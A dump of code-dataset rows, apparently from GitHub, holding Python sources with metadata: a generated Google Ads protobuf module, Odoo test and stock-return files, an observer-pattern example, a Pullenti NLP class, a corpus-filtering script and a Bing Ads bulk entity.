# @@protoc_insertion_point(class_scope:google.ads.googleads.v5.services.MutateRemarketingActionsResponse)
})
_sym_db.RegisterMessage(MutateRemarketingActionsResponse)
MutateRemarketingActionResult = _reflection.GeneratedProtocolMessageType('MutateRemarketingActionResult', (_message.Message,), {
'DESCRIPTOR' : _MUTATEREMARKETINGACTIONRESULT,
'__module__' : 'google.ads.googleads_v5.proto.services.remarketing_action_service_pb2'
,
'__doc__': """The result for the remarketing action mutate.
Attributes:
resource_name:
Returned for successful operations.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v5.services.MutateRemarketingActionResult)
})
_sym_db.RegisterMessage(MutateRemarketingActionResult)
DESCRIPTOR._options = None
_GETREMARKETINGACTIONREQUEST.fields_by_name['resource_name']._options = None
_MUTATEREMARKETINGACTIONSREQUEST.fields_by_name['customer_id']._options = None
_MUTATEREMARKETINGACTIONSREQUEST.fields_by_name['operations']._options = None
_REMARKETINGACTIONSERVICE = _descriptor.ServiceDescriptor(
name='RemarketingActionService',
full_name='google.ads.googleads.v5.services.RemarketingActionService',
file=DESCRIPTOR,
index=0,
serialized_options=b'\312A\030googleads.googleapis.com',
create_key=_descriptor._internal_create_key,
serialized_start=1116,
serialized_end=1648,
methods=[
_descriptor.MethodDescriptor(
name='GetRemarketingAction',
full_name='google.ads.googleads.v5.services.RemarketingActionService.GetRemarketingAction',
index=0,
containing_service=None,
input_type=_GETREMARKETINGACTIONREQUEST,
output_type=google_dot_ads_dot_googleads__v5_dot_proto_dot_resources_dot_remarketing__action__pb2._REMARKETINGACTION,
serialized_options=b'\202\323\344\223\0026\0224/v5/{resource_name=customers/*/remarketingActions/*}\332A\rresource_name',
create_key=_descriptor._internal_create_key,
),
_descriptor.MethodDescriptor(
name='MutateRemarketingActions',
full_name='google.ads.googleads.v5.services.RemarketingActionService.MutateRemarketingActions',
index=1,
containing_service=None,
input_type=_MUTATEREMARKETINGACTIONSREQUEST,
output_type=_MUTATEREMARKETINGACTIONSRESPONSE,
serialized_options=b'\202\323\344\223\002<\"7/v5/customers/{customer_id=*}/remarketingActions:mutate:\001*\332A\026customer_id,operations',
create_key=_descriptor._internal_create_key,
),
])
_sym_db.RegisterServiceDescriptor(_REMARKETINGACTIONSERVICE)
DESCRIPTOR.services_by_name['RemarketingActionService'] = _REMARKETINGACTIONSERVICE
# @@protoc_insertion_point(module_scope)
| [
"[email protected]"
]
| |
d6ce1c57d5d48ad3fcd540884b07b83997ecc399 | 4c3e992678341ccaa1d4d14e97dac2e0682026d1 | /addons/mass_mailing/tests/test_mail.py | 09822f1c111822ef55b13830edbcad40590accf1 | []
| no_license | gahan-corporation/wyatt | 3a6add8f8f815bd26643e1e7c81aea024945130d | 77e56da362bec56f13bf0abc9f8cf13e98461111 | refs/heads/master | 2021-09-03T18:56:15.726392 | 2018-01-08T02:54:47 | 2018-01-08T02:54:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 328 | py | # -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
from gerp.addons.mail.tests.common import TestMail
class test_message_compose(TestMail):
def test_OO_mail_mail_tracking(self):
""" Tests designed for mail_mail tracking (opened, replied, bounced) """
pass
| [
"[email protected]"
]
| |
c3814fd79b1a1d8c165a84db0088b1cace467d56 | 417e6eb589d3441c3c8b9901e2d35873dd35f097 | /src/structural/observer.py | 0ea844bf4d99f8480fb048987da3a1e944975507 | []
| no_license | vmgabriel/pattern-python | 4fc6127ebdb521d0a4a7b10b4b68880f691ee630 | 74f1cd1314a79060d1df1a6df018c39572bc2b4c | refs/heads/master | 2023-04-24T06:45:16.773415 | 2021-05-10T21:14:51 | 2021-05-10T21:14:51 | 365,394,737 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,379 | py | """Observer Pattern"""
# Libraries
from abc import ABCMeta, abstractmethod
class Publisher(metaclass=ABCMeta):
def add_observer(self, observer):
pass
def remove_observer(self, observer):
pass
def notify_all(self):
pass
def write_post(self, text):
pass
class PlatziForum(Publisher):
def __init__(self):
self.users_list = []
self.post = None
def add_observer(self, observer):
if observer not in self.users_list:
self.users_list.append(observer)
def remove_observer(self, observer):
self.users_list.remove(observer)
def notify_all(self):
for observer in self.users_list:
observer.notify(self.post)
def write_post(self, text):
self.post = text
self.notify_all()
class Subscriber:
def notify(self, post):
pass
class UserA(Subscriber):
def __init__(self):
pass
def notify(self, post):
print('User A ha sido notificado - {}'.format(post))
class UserB(Subscriber):
def __init__(self):
pass
def notify(self, post):
print('User B ha sido notificado - {}'.format(post))
if __name__ == '__main__':
foro = PlatziForum()
user1 = UserA()
user2 = UserB()
foro.add_observer(user1)
foro.add_observer(user2)
foro.write_post('Post en Platzi')
| [
"[email protected]"
]
| |
be868d1d34aa3dad1df6b4c850a30a4565685c4c | e22390ec9aa1a842626075113472f81076e1bf5f | /pullenti/semantic/SemFragment.py | 3954b163c1693d239274475b64e5e3f1cd4930fb | []
| no_license | pullenti/PullentiPython | ba9f450f3f49786732e80f34d0506d4a6d41afc3 | 815d550b99f113034c27f60d97493ce2f8e4cfcc | refs/heads/master | 2021-06-22T17:12:36.771479 | 2020-12-11T06:10:23 | 2020-12-11T06:10:23 | 161,268,453 | 3 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,299 | py | # Copyright (c) 2013, Pullenti. All rights reserved.
# Non-Commercial Freeware and Commercial Software.
# This class is generated using the converter UniSharping (www.unisharping.ru) from Pullenti C#.NET project.
# The latest version of the code is available on the site www.pullenti.ru
import typing
from pullenti.unisharp.Utils import Utils
from pullenti.ner.core.GetTextAttr import GetTextAttr
from pullenti.ner.core.MiscHelper import MiscHelper
from pullenti.semantic.ISemContainer import ISemContainer
from pullenti.semantic.SemGraph import SemGraph
from pullenti.semantic.SemFragmentType import SemFragmentType
from pullenti.semantic.SemObjectType import SemObjectType
class SemFragment(ISemContainer):
""" Фрагмент блока (предложение)
"""
def __init__(self, blk : 'SemBlock') -> None:
self.__m_graph = SemGraph()
self.m_higher = None;
self.typ = SemFragmentType.UNDEFINED
self.is_or = False
self.begin_token = None;
self.end_token = None;
self.tag = None;
self.m_higher = blk
@property
def graph(self) -> 'SemGraph':
""" Объекты фрагмента (отметим, что часть объектов, связанных с этим блоком,
могут находиться в графах вышележащих уровней).
"""
return self.__m_graph
@property
def higher(self) -> 'ISemContainer':
return self.m_higher
@property
def block(self) -> 'SemBlock':
""" Владелец фрагмента """
return self.m_higher
@property
def root_objects(self) -> typing.List['SemObject']:
""" Список объектов SemObject, у которых нет связей. При нормальном разборе
такой объект должен быть один - это обычно предикат. """
res = list()
for o in self.__m_graph.objects:
if (len(o.links_to) == 0):
res.append(o)
return res
@property
def can_be_error_structure(self) -> bool:
cou = 0
vcou = 0
for o in self.__m_graph.objects:
if (len(o.links_to) == 0):
if (o.typ == SemObjectType.VERB):
vcou += 1
cou += 1
if (cou <= 1):
return False
return vcou < cou
@property
def spelling(self) -> str:
""" Текст фрагмента """
return MiscHelper.get_text_value(self.begin_token, self.end_token, GetTextAttr.KEEPREGISTER)
@property
def begin_char(self) -> int:
return (0 if self.begin_token is None else self.begin_token.begin_char)
@property
def end_char(self) -> int:
return (0 if self.end_token is None else self.end_token.end_char)
def __str__(self) -> str:
if (self.typ != SemFragmentType.UNDEFINED):
return "{0}: {1}".format(Utils.enumToString(self.typ), Utils.ifNotNull(self.spelling, "?"))
else:
return Utils.ifNotNull(self.spelling, "?") | [
"[email protected]"
]
| |
a39f0bac82f84873a6dbf8cfd3f6a437ad45d06c | 045cb1a5638c3575296f83471758dc09a8065725 | /addons/stock_account/wizard/stock_picking_return.py | 5d54d201e6b6a357cd694038a75f20b33ff45cc4 | []
| no_license | marionumza/saas | 7236842b0db98d1a0d0c3c88df32d268509629cb | 148dd95d991a348ebbaff9396759a7dd1fe6e101 | refs/heads/main | 2023-03-27T14:08:57.121601 | 2021-03-20T07:59:08 | 2021-03-20T07:59:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,299 | py | # -*- coding: utf-8 -*-
# Part of Harpiya. See LICENSE file for full copyright and licensing details.
from harpiya import api, fields, models
class StockReturnPicking(models.TransientModel):
_inherit = "stock.return.picking"
@api.model
def default_get(self, default_fields):
res = super(StockReturnPicking, self).default_get(default_fields)
for i, k, vals in res.get('product_return_moves', []):
vals.update({'to_refund': True})
return res
def _create_returns(self):
new_picking_id, pick_type_id = super(StockReturnPicking, self)._create_returns()
new_picking = self.env['stock.picking'].browse([new_picking_id])
for move in new_picking.move_lines:
return_picking_line = self.product_return_moves.filtered(lambda r: r.move_id == move.origin_returned_move_id)
if return_picking_line and return_picking_line.to_refund:
move.to_refund = True
return new_picking_id, pick_type_id
class StockReturnPickingLine(models.TransientModel):
_inherit = "stock.return.picking.line"
to_refund = fields.Boolean(string="Update quantities on SO/PO", default=True,
help='Trigger a decrease of the delivered/received quantity in the associated Sale Order/Purchase Order')
| [
"[email protected]"
]
| |
f9ae3dfa9e5cae2982f31a833e426773e239ed40 | e77732bce61e7e97bad5cee1b07d1b5f9b6fa590 | /cat/utils/data/exclude_corpus.py | 08cc3af28cfc90a11efade2a6bdf4941e1369fb7 | [
"Apache-2.0"
]
| permissive | entn-at/CAT | 9f28f5ff75b37ac90baf63609226deb99d73dbe2 | fc74841e8f6b7eb2f2f88bb7c09b30ad5a8c16f4 | refs/heads/master | 2023-04-10T13:32:31.333889 | 2023-02-27T16:50:43 | 2023-02-27T17:29:07 | 236,718,892 | 0 | 0 | null | 2020-01-28T11:24:01 | 2020-01-28T11:24:00 | null | UTF-8 | Python | false | false | 2,432 | py | # Author: Huahuan Zheng ([email protected])
#
# Fetch n lines from source corpus and exclude part of the source if needed.
#
import sys
import os
import argparse
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("corpus", type=str,
help="Path to the source text corpus.")
parser.add_argument("--exclude-corpus", type=str, dest="f_exc",
help="Add this option if you want to exclude it from source corpus, take first column as index.")
parser.add_argument("-n", "--num-lines", type=int,
help="Number of lines to be prepared, if not specified, would take all of them (after excluded).")
args = parser.parse_args()
if not os.path.isfile(args.corpus):
raise FileNotFoundError(f"--corpus={args.corpus} is not a valid file.")
if args.f_exc is not None and not os.path.isfile(args.f_exc):
raise FileNotFoundError(
f"--exclude-corpus={args.f_exc} is not a valid file.")
if args.num_lines is not None:
if args.num_lines < 0:
raise ValueError(
f"--num-lines={args.num_lines} < 0 is invalid, expected valud >= 0")
num_lines = args.num_lines
else:
num_lines = sum(1 for _ in open(args.corpus, 'r'))
# prepare excluding list
excluding_list = set()
if args.f_exc is not None:
with open(args.f_exc, 'r') as fi:
for line in fi:
line = line.strip()
if ' ' in line or '\t' in line:
uid, _ = line.split(maxsplit=1)
else:
uid = line
excluding_list.add(uid)
cnt = 0
with open(args.corpus, 'r') as fi:
try:
for line in fi:
line = line.strip()
if ' ' in line or '\t' in line:
uid, _ = line.split(maxsplit=1)
else:
uid = line
if uid in excluding_list:
continue
if cnt >= num_lines:
break
sys.stdout.write(f"{line}\n")
cnt += 1
except IOError:
exit(0)
if cnt < num_lines and args.num_lines is not None:
raise RuntimeError(
f"Source corpus text doesn't have enough unique lines to export: {cnt} in total, expect {num_lines}")
| [
"[email protected]"
]
| |
6c249c704fb9dcad286b896aac14b4023e741304 | 98dbb9cd9523809b4ee0e6b92334fa6a2a6af2a3 | /bingads/v13/bulk/entities/audiences/bulk_campaign_negative_product_audience_association.py | 80d8c4fc61c6babc61466c3ac50597c9c0a847f1 | [
"MIT"
]
| permissive | BingAds/BingAds-Python-SDK | a2f9b0c099b574a4495d0052218f263af55cdb32 | 373a586402bf24af7137b7c49321dbc70c859fce | refs/heads/main | 2023-07-27T15:31:41.354708 | 2023-07-10T03:21:03 | 2023-07-10T03:21:03 | 31,927,550 | 105 | 182 | NOASSERTION | 2023-09-04T06:51:20 | 2015-03-09T23:09:01 | Python | UTF-8 | Python | false | false | 586 | py | from bingads.v13.bulk.entities.audiences.bulk_campaign_negative_audience_association import *
class BulkCampaignNegativeProductAudienceAssociation(BulkCampaignNegativeAudienceAssociation):
""" Represents an Campaign Negative Product Audience Association that can be read or written in a bulk file.
For more information, see Campaign Negative Product Audience Association at https://go.microsoft.com/fwlink/?linkid=846127.
*See also:*
* :class:`.BulkServiceManager`
* :class:`.BulkOperation`
* :class:`.BulkFileReader`
* :class:`.BulkFileWriter`
"""
| [
"[email protected]"
]
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.